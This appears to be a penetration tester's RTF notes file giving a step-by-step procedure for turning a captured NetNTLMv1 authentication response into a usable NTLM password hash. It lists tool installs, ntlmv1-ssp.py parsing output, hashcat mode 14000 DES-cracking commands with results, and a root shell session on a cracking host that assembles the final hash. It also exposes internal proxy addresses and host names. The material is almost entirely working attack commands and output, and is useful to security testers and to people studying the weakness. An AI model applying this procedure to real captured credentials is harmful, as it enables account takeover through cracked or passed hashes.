{\rtf1\ansi\ansicpg1252\cocoartf2512
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;}
\margl1440\margr1440\vieww17020\viewh11240\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 Recovering NTLM hash from NetNTLMv1 hash:\
\
Install:\
git config --global http.proxy 10.242.64.23:3128\
git clone https://github.com/moxie0/chapcrack.git\
pip --proxy http://10.242.64.23:3128 install passlib\
pip --proxy http://10.242.64.23:3128 install dpk\
apt-get install python-dev\
apt-get install python-m2crypto\
git clone https://github.com/evilmog/ntlmv1-multi.git\
\
\
Best Resources:\
https://hashcat.net/forum/thread-5832.html\
https://github.com/evilmog/ntlmv1-multi\
\
\
\
\
Process:\
\
UserName::DOMAIN:415230EBF0821D1600000000000000000000000000000000:49AEBFB9C79EA9CF9E8A764AEBF408AD6EF68B18C08CF703:3843f7514098be80\
\
\
\
\
python ../../ntlmv1-multi/ntlmv1-ssp.py --ssp "UserName::DOMAIN:415230EBF0821D1600000000000000000000000000000000:49AEBFB9C79EA9CF9E8A764AEBF408AD6EF68B18C08CF703:3843f7514098be80"\
Hashfield Split:\
['UserName', '', 'DOMAIN', '415230EBF0821D1600000000000000000000000000000000', '49AEBFB9C79EA9CF9E8A764AEBF408AD6EF68B18C08CF703', '3843f7514098be80']\
\
Hostname: DOMAIN\
Username: UserName\
LM Response: 415230EBF0821D1600000000000000000000000000000000\
NT Response: 49AEBFB9C79EA9CF9E8A764AEBF408AD6EF68B18C08CF703\
Client Challenge: 3843f7514098be80\
SRV Challenge: 8262f115effc631b\
\
To Calculate final 4 characters of NTLM hash use:\
./ct3_to_ntlm.bin 6EF68B18C08CF703 3843f7514098be80 415230EBF0821D1600000000000000000000000000000000\
\
To crack with hashcat create a file with the following contents:\
49AEBFB9C79EA9CF:8262f115effc631b\
9E8A764AEBF408AD:8262f115effc631b\
\
To crack with hashcat:\
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1\
\
\
/opt/hashcat/hashcat64.bin -m 14000 -a 3 -1 /opt/hashcat/charsets/DES_full.charset --hex-charset tont_hashes.txt ?1?1?1?1?1?1?1?1\
\
Results:\
Session..........: hashcat\
Status...........: Cracked\
Hash.Type........: DES (PT = $salt, key = $pass)\
Hash.Target......: des.txt\
Time.Started.....: Fri May 24 12:48:03 2019 (2 days, 21 hours)\
\
\
\
Putting the hash together:\
\
# /opt/hashcat/hashcat64.bin --show -m 14000 des.txt \
9e8a764aebf408ad:8262f115effc631b:$HEX[e93e792afde062a7]\
6ef68b18c08cf703:8262f115effc631b:$HEX[8543000000000000]\
49aebfb9c79ea9cf:8262f115effc631b:$HEX[2a75388c6ddadfa1]\
\
\
\
\pard\pardeftab720\sl280\partightenfactor0

\f1 \cf2 \expnd0\expndtw0\kerning0
root@c-atl1ttncrack02:/opt/common/work/20190522_mmarziale# perl /opt/common/hashcat-utils/src/deskey_to_ntlm.pl 8543000000000000\
84840000000000\
root@c-atl1ttncrack02:/opt/common/work/20190522_mmarziale# perl /opt/common/hashcat-utils/src/deskey_to_ntlm.pl e93e792afde062a7\
e87de15fdc18d3\
root@c-atl1ttncrack02:/opt/common/work/20190522_mmarziale# perl /opt/common/hashcat-utils/src/deskey_to_ntlm.pl 2a75388c6ddadfa1\
2ae8e466db77d0\
\
\
\
2ae8e466db77d0e87de15fdc18d38484\
\
\pard\pardeftab720\sl280\partightenfactor0

\f0 \cf0 \kerning1\expnd0\expndtw0 \
\
Alternate path to the last 4 characters of the hash:\
\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0
\cf0 ../../hashcat-utils/bin/ct3_to_ntlm.bin 6EF68B18C08CF703 3843f7514098be80 415230EBF0821D1600000000000000000000000000000000\
8484\
\pard\pardeftab720\sl280\partightenfactor0
\cf0 \
}